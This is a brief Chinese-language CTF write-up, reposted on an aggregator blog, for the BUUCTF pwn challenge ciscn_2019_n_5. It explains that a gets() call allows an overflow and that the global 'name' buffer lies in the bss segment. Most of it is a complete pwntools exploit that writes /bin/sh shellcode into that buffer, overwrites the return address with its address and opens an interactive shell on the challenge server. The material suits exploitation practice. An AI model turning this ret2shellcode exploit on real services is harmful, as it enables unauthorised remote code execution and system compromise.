Buuctf(pwn) ciscn_2019_n_5
生活随笔
收集整理的這篇文章主要介紹了
Buuctf(pwn) ciscn_2019_n_5
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
發現name在全局變量bss段上
可以利用 gets() 進行溢出
from pwn import* r=remote('node3.buuoj.cn',27785) context(arch='amd64',os='linux') 說明版本架構 shellcode=asm(shellcraft.sh()) 獲取生成調用 bin/sh的 shellcode r.sendlineafter('tell me your name',shellcode) 往name里面寫入shellcode payload='a'*0x28+p64(0x601080) r.sendlineafter('What do you want to say to me?',payload) r.interactive()總結
以上是生活随笔為你收集整理的Buuctf(pwn) ciscn_2019_n_5的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: BUUCTF(pwn)[Harekaze
- 下一篇: BUUCTF(pwn)ciscn_201